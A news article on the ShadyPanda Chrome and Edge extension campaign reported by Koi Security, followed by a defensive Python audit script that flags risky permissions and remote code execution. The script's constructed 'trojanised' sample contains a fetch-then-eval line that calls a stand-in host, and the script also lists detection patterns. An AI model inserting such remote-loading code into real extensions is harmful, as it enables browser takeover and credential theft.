Beware! Google Chrome has had extensions that spread spyware for two years

A threat actor known as ShadyPanda has been linked to a browser extension campaign that has amassed over 4.3 million installations over seven years. According to a report by Koi Security, five of these extensions, which were legitimate in their early days, were modified in mid-2024, attracting up to 300,000 installations before being removed from the stores.

We sell you spyware!

These extensions now execute code remotely, allowing arbitrary JavaScript to be downloaded and run with full access to the browser. According to security researcher Tuval Admoni, these tools monitor every visit and exfiltrate browsing history, in addition to collecting users’ browser fingerprints. Some extensions covertly inject tracking codes when visiting popular sites like eBay and Amazon, generating illicit commissions from users’ purchases.

The situation worsened in 2024, when the attack evolved to include active control of the browser: search queries were redirected and cookies were exfiltrated from specific domains. The extensions can also carry out ‘man-in-the-middle’ attacks, facilitating credential theft and code injection on websites.

Although the malicious activity was first observed in 2023, when 20 extensions were published in the Chrome Web Store and 125 in Microsoft Edge, the manipulation of these programs suggests a systematic exploitation of vulnerabilities that has persisted for years. Koi Security warns users who have installed these extensions to remove them immediately and rotate their credentials, since the auto-update mechanism, designed to keep extensions secure, has become an attack vector.
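Administrators who want to triage the extensions in their own fleet can check an unpacked extension for the two traits described above: broad host access combined with history and cookie permissions, and code that fetches JavaScript at runtime and executes it. The following audit script is an added example, not code from Koi Security or from the report; the permission lists, regex patterns and the two sample manifests are constructed assumptions for illustration.

```python
"""Heuristic audit of an unpacked browser extension: broad host access plus history/cookie
permissions, and code that executes fetched JavaScript. Indicator lists are assumptions."""
import re

# Permissions that, combined with broad host access, let an extension observe every
# visit and read cookies; MV3 moved host patterns from "permissions" to "host_permissions"
SENSITIVE_PERMS = {"cookies", "history", "tabs", "webRequest", "webNavigation", "scripting"}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Source patterns that turn downloaded text into executable code
CODE_PATTERNS = [
    (re.compile(r"\beval\s*\("), "eval() on dynamic input"),
    (re.compile(r"new\s+Function\s*\("), "new Function() constructor"),
    (re.compile(r"createElement\s*\(\s*['\"]script['\"]"), "injects a <script> element"),
]
REMOTE_FETCH = re.compile(r"\b(fetch|XMLHttpRequest)\b.*https?://", re.S)

def audit_extension(manifest: dict, sources: dict) -> list:
    """Return findings for one extension given its manifest dict and {path: js source}."""
    findings = []
    perms = set(manifest.get("permissions", []))
    hosts = set(manifest.get("host_permissions", [])) | {p for p in perms if "/" in p or p == "<all_urls>"}
    risky = sorted(perms & SENSITIVE_PERMS)
    broad = sorted(hosts & BROAD_HOSTS)
    if broad and risky:
        findings.append(f"broad host access {broad} with {risky}")
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 nests the policy under "extension_pages"
        csp = csp.get("extension_pages", "")
    if "unsafe-eval" in csp:
        findings.append("CSP permits unsafe-eval")
    for path, code in sources.items():
        hits = [label for pat, label in CODE_PATTERNS if pat.search(code)]
        if hits and REMOTE_FETCH.search(code):
            findings.append(f"{path}: fetches a remote URL and {', '.join(hits)}")
    return findings

# Constructed samples: a narrowly scoped extension and a trojanised update (not real code)
BENIGN = ({"manifest_version": 3, "permissions": ["storage"],
           "host_permissions": ["https://example.com/*"]},
          {"background.js": "chrome.storage.local.get('theme', applyTheme);"})
TROJANISED = ({"manifest_version": 2,
               "permissions": ["cookies", "history", "tabs", "<all_urls>"],
               "content_security_policy": "script-src 'self' 'unsafe-eval'; object-src 'self'"},
              {"background.js": "fetch('https://update.example.invalid/p.js')"
                                ".then(r => r.text()).then(src => eval(src));"})

if __name__ == "__main__":
    for name, (manifest, sources) in (("benign", BENIGN), ("trojanised", TROJANISED)):
        print(name, audit_extension(manifest, sources) or ["no findings"])
```

Run against a real extension, `manifest` is the parsed manifest.json and `sources` maps each bundled .js path to its text; a hit on all three checks is the pattern the report describes, while a single permission finding on its own is common in legitimate extensions and only merits a closer look.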

The story of ShadyPanda highlights the need for more rigorous oversight of browser extensions, as marketplaces review applications at the time of submission but do not monitor their behavior after approval.